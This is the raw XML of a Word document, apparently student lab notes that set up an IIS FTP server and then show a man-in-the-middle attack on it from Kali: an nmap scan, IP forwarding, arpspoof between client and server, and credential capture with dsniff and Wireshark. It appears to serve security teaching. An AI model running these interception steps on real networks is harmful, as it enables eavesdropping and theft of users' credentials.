            <wp:extent cx="4572000" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15021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f691fcca0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532EC7F9" w14:textId="76D8E4CB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="78C0C9A0" wp14:anchorId="6B3970F5">
            <wp:extent cx="4572000" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="727285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f8cfc01aa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46442B44" w14:textId="24DBB7B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="07CD7AD6" wp14:anchorId="33C215AE">
            <wp:extent cx="4572000" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="634332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22664143c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711D207E" w14:textId="6E43D62F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Tools-IIS manager-right click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>winserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> &amp;add FTP site-Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>FTPsite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> name-videos &amp; path to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>cdrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>inetpub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>ftproot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>-basic auth-all users with read and write permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="69F565FA" w14:textId="1FEAA0F5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="4511B2AC" wp14:anchorId="0B3A2455">
            <wp:extent cx="4572000" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="431462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ae59ed6f3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3E3DC10D" w14:textId="0DBB6E5C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="04EC1382" wp14:anchorId="3EAB7249">
            <wp:extent cx="4572000" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2087772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ad4ea316d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70FF370A" w14:textId="00F96EBB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="5C6E3AA6" wp14:anchorId="39714CEB">
            <wp:extent cx="4572000" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1303854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7f14e84d3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61520059" w14:textId="27D98F0A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="683213F3" wp14:anchorId="67D1130F">
            <wp:extent cx="4572000" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154717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59a3c08d3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28C6C638" w14:textId="0D036E65">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Create an user on FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="122CB536" w14:textId="0B907B44">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Comp Management-local users &amp; groups-create user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="2500C28A" w14:textId="03324CD8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="2DC59DA7" wp14:anchorId="19A147EA">
            <wp:extent cx="4572000" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2091915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55f162abd1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21629232" w14:textId="70687DDE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D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Browse through another </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.216.102 whether we are able to reach FTP server or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="14768D04" w14:textId="611D3950">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="4D04FFEB" wp14:anchorId="36323938">
            <wp:extent cx="4572000" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="979716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cca66998a43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68DDE3F5" w14:textId="0779DF80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D03940">
        <w:rPr/>
        <w:t>Go to Kali by logging in as root ad do nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="443A3E57" w14:textId="21A720D8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Nmap –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> –F 192.168.216.*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="511C6429" w14:textId="374286E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>This will tell us that which system is client and which system is FTP server. Where port 21 is server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="34F2CCB2" w14:textId="6E183012">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="1A99A9E7" wp14:anchorId="116BD545">
            <wp:extent cx="4257675" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="416174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2ffe7b302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7E7E21B1" w14:textId="7E3B980C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D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> on kali and enable routing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="31770D67" w14:textId="2BEE322F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve">Apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="791724C1" w14:textId="794271DB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Echo 1 &gt; /proc/sys/net/iv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="22C4330F" w14:textId="1F4FBD97">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> –w net.ipv4.ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="130CBF25" w14:textId="1A7D7AAE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="35FEBE38" wp14:anchorId="5D5619FA">
            <wp:extent cx="4572000" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1755686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890d519cd48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2E0733AC" w14:textId="07AF7867">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="282AB4B9" wp14:anchorId="29062576">
            <wp:extent cx="4572000" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184776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b8e79836f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71130C47" w14:textId="6911C04A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D03940">
        <w:rPr/>
        <w:t>Now arpspoof</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="26C6FDB0" w14:textId="2BADD272">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> -I eth0 –t 192.168.216.101 -r 192.168.216.102</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="757B7F4D" w14:textId="40940289">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>This will spoof the mac addresses of FTP client and server with Kali or MITM machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="2D152B52" w14:textId="1122CBFB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="1ABE6360" wp14:anchorId="3DB4B4F1">
            <wp:extent cx="4572000" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1568324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f145a42f74a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30962EFC" w14:textId="00C8EA2F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="63936D85" w14:textId="360311A3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t xml:space="preserve"> eth0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="3BE0C14E" w14:textId="16792956">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="2EF9790A" wp14:anchorId="3E073996">
            <wp:extent cx="4572000" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1425080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b2f93a2a9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3940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="3164AA19" w14:textId="6FFEEE25">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="46D03940">
        <w:rPr/>
        <w:t>Wireshark output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46D03940" w:rsidP="46D03940" w:rsidRDefault="46D03940" w14:paraId="646C6303" w14:textId="548F1D3C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="1CFA7B48" wp14:anchorId="786A0681">
            <wp:extent cx="4572000" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1641912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7c74a1790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BD8DF39"/>
  <w15:docId w15:val="{f1844ad5-34cd-4810-b5ae-ffd3b518d474}"/>
  <w:rsids>
    <w:rsidRoot w:val="30CA61AC"/>
    <w:rsid w:val="30CA61AC"/>
    <w:rsid w:val="46D03940"/>
    <w:rsid w:val="6123FF1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01b85da8b1cc4a21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R2cc0bee10a8b4886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="Re6def97ba92a43f6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="Raddff6f3c44c4837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R45890a8ab27e43e1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="Rcf3b5fced4bf49a9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="Refcd7325b13549f0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R37e7a5aa6a1b45f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rd7f0400c09744155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Ra875b94df546428f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R2559c6c4e8394b91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R139f2b4d980b4912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R32af691fcca04445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="R44bf8cfc01aa47c7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="R92a22664143c401b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="Rfd0ae59ed6f34dd8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Ra74ad4ea316d4f75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R4f27f14e84d340ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="Re6759a3c08d34c86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R8f55f162abd14ea4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="Rb62cca66998a4316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="R03d2ffe7b3024f83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="R814890d519cd4891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="R210b8e79836f42e2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="R329f145a42f74ab2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="R36bb2f93a2a946c0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="Rcd27c74a179045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Lucifer Fernandes</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Lucifer Fernandes</lastModifiedBy>
  <revision>3</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-01T08:05:09.9767508Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-02T05:53:16.7920986Z</dcterms:modified>
</coreProperties>
</file>